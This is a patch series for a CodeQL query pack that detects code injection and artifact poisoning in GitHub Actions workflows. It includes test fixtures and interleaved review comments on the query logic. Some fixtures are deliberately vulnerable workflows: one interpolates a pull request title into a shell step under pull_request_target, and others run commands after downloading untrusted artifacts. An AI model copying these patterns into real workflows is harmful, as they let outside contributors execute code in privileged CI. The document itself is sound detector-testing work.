@@ -50,6 +50,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -185,6 +186,9 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -282,6 +286,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 7061f509b812..25441104064a 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -50,6 +50,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -185,6 +186,9 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -281,6 +285,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml new file mode 100644 index 000000000000..4755350f0fc8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml @@ -0,0 +1,34 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml new file mode 100644 index 000000000000..725038ab8165 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + workflow: wf.yml + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml new file mode 100644 index 000000000000..4d2a9774753a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml 
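Review bot: In artifactpoisoning1.yml the filter `return artifact.name == ""` can never select an artifact, so `matchArtifact` would be undefined on a real run, while the sibling fixtures name the artifact explicitly (`name: artifact_name`, `--name "artifact_name"`). `return artifact.name == "artifact_name"` keeps this fixture realistic and consistent with the others. The expected result recorded for it reports the step location rather than the artifact name, so the change should not alter what the query reports.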
@@ -0,0 +1,19 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml new file mode 100644 index 000000000000..26d342f7060c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + artifacts_url=${{ github.event.workflow_run.artifacts_url }} + gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + do + IFS=$'\t' read name url <<< "$artifact" + gh api $url > "$name.zip" + unzip -d "$name" "$name.zip" + done + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml new file mode 100644 index 000000000000..3cab86f3171b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + - name: Sink + run: echo ${{ env.ISSUE_KEY }} + + 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected new file mode 100644 index 000000000000..8113215481c1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -0,0 +1,4 @@ +| .github/workflows/artifactpoisoning1.yml:13:9:30:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning3.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning4.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref new file mode 100644 index 000000000000..21d37e957a1c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoning.ql + diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index c3a3ec2f988c..5a572edf423f 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,5 +1,6 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | From 2a1226c37a65cd5fab9b400845da5bbe692669bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Apr 2024 12:54:42 +0200 Subject: [PATCH 142/707] Add workflow_dispatch to the triggers for artifact poisoning --- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5b0c4fc4e69b..348b6bbdf08a 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -16,7 +16,7 @@ import codeql.actions.security.ArtifactPoisoningQuery from LocalJob job, ArtifactDownloadStep download, Step run where - job.getWorkflow().getATriggerEvent() = "workflow_run" and + job.getWorkflow().getATriggerEvent() = ["workflow_run", "workflow_dispatch"] and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and From a2bbf704ee0f488030c27bf928dbaa5c2550d0a3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 11:39:35 +0200 Subject: [PATCH 143/707] fix: triggering events for artifact poisoning --- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 22 ++++++++++++++++++-- 1 file changed, 20 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 348b6bbdf08a..5b71a64d52e4 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql 
@@ -14,9 +14,27 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -from LocalJob job, ArtifactDownloadStep download, Step run +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + +from Workflow w, LocalJob job, ArtifactDownloadStep download, Step run where - job.getWorkflow().getATriggerEvent() = ["workflow_run", "workflow_dispatch"] and + w = job.getWorkflow() and + ( + // The Workflow is triggered by an event other than `pull_request` + not isSingleTriggerWorkflow(w, "pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + isSingleTriggerWorkflow(w, "workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = w.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not isSingleTriggerWorkflow(caller, "pull_request") + ) + ) and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and From 119c7b81586a064426f4e10aef033d2101a4f8bf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 11:41:42 +0200 Subject: [PATCH 144/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7d2de60df75c..e99a12dda08d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.4 +version: 0.0.5 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f36c119e7202..e37339e16cbc 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
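Review bot: The `workflow_call` branch of the new privilege test is not a distinct case: a workflow whose only trigger is `workflow_call` already satisfies `not isSingleTriggerWorkflow(w, "pull_request")`, so it is treated as privileged whether or not any caller is, and the caller lookup never changes the outcome. If the comments describe the intent, the first disjunct should exclude that case, `not isSingleTriggerWorkflow(w, "pull_request") and not isSingleTriggerWorkflow(w, "workflow_call")`; if reusable workflows are meant to be privileged unconditionally, the second disjunct and its comment can be dropped instead. The same structure is carried into `Workflow.isPrivileged()` in the Ast.qll hunk of the "Centralize isPrivileged decisions" commit below. The `from`/`where` clause continues past the end of this hunk.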
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.4 +version: 0.0.5 groups: - actions - queries From 2988bc8885d51529ea9b998076e8b3744e27fd28 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:39:00 +0200 Subject: [PATCH 145/707] Centralize isPrivileged decisions --- ql/lib/codeql/actions/Ast.qll | 21 +++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 7 +- ql/src/Security/CWE-077/EnvVarInjection.ql | 11 ++- .../CWE-077/PrivilegedEnvVarInjection.ql | 13 ++- ql/src/Security/CWE-078/CommandInjection.ql | 11 ++- .../CWE-078/PrivilegedCommandInjection.ql | 13 ++- ql/src/Security/CWE-094/CodeInjection.ql | 11 ++- .../CWE-094/PrivilegedCodeInjection.ql | 13 ++- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 22 +---- ql/src/Security/CWE-829/UntrustedCheckout.ql | 19 +--- .../Security/CWE-077/EnvVarInjection.expected | 1 - .../CWE-078/CommandInjection.expected | 1 - .../Security/CWE-094/CodeInjection.expected | 87 ------------------- 13 files changed, 75 insertions(+), 155 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d865eb54905b..17768245fdca 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -35,6 +35,8 @@ class AstNode instanceof AstNodeImpl { Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } + CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } + Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } 
@@ -123,6 +125,25 @@ class Workflow extends AstNode instanceof WorkflowImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(string t | this.getATriggerEvent() = t | t) = 1 + } + + predicate isPrivileged() { + // The Workflow is triggered by an event other than `pull_request` + not this.hasSingleTrigger("pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not caller.hasSingleTrigger("pull_request") + ) + } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a1470a41dd0f..3f9293bc972a 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -95,10 +95,15 @@ abstract class AstNodeImpl extends TAstNode { JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() } /** - * Gets the enclosing workflow statement. + * Gets the enclosing workflow if any. */ WorkflowImpl getEnclosingWorkflow() { this = result.getAChildNode*() } + /** + * Gets the enclosing composite action if any. + */ + CompositeActionImpl getEnclosingCompositeAction() { this = result.getAChildNode*() } + /** * Gets a environment variable expression by name in the scope of the current node. */ diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 2e978ad9e53f..e758932b208a 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql 
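Review bot: `hasSingleTrigger` and `isPrivileged` are new public members of `Workflow` without QLDoc, while `getEnclosingCompositeAction` in the internal AST hunk of the same commit does get one. A QLDoc line for the first could read `/** Holds if the given trigger is the only event that triggers this workflow. */`, and for the second `/** Holds if this workflow runs in a privileged context: its triggers are not a sole pull_request, or it is workflow_call-only and some caller is privileged. */`. The aggregate `count(string t | this.getATriggerEvent() = t | t) = 1` can be written `count(this.getATriggerEvent()) = 1`, which reads more directly and means the same thing.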
@@ -17,7 +17,16 @@ import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink -where EnvVarInjectionFlow::flowPath(source, sink) +where + EnvVarInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 6508b4586292..811a6f65c7c0 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -16,16 +16,13 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() 
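Review bot: The new filter decides privilege from the source's enclosing workflow, and routes every composite-action source to this query unconditionally, but neither choice is stated in the code. A comment above the disjunction such as `// Classified by the source's workflow; composite actions have no trigger of their own and are always reported by this (non-privileged) variant` would spare the next reader a trip through the Privileged* queries. If the flow library ever tracks a path across files (caller inputs into a reusable workflow, say), the sink inherits the source's classification, which looks deliberate but is worth saying. CommandInjection.ql and CodeInjection.ql in the following hunks have the same shape and would take the same comment.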
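Review bot: In PrivilegedEnvVarInjection.ql, `exists(Workflow w | w = source.getNode().asExpr().getEnclosingWorkflow() and w.isPrivileged())` is equivalent to `source.getNode().asExpr().getEnclosingWorkflow().isPrivileged()`, since a member-predicate call on a receiver with several values holds when any of them qualifies. The temporary only earns its keep in the non-privileged variant, where the negation has to be scoped to an existing workflow. PrivilegedCommandInjection.ql and PrivilegedCodeInjection.ql in the hunks below use the same pattern.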
diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 826a3b41e380..de60141bb400 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -17,7 +17,16 @@ import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink -where CommandInjectionFlow::flowPath(source, sink) +where + CommandInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql index 2f9a09f59c38..bbfb226ecd1c 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql 
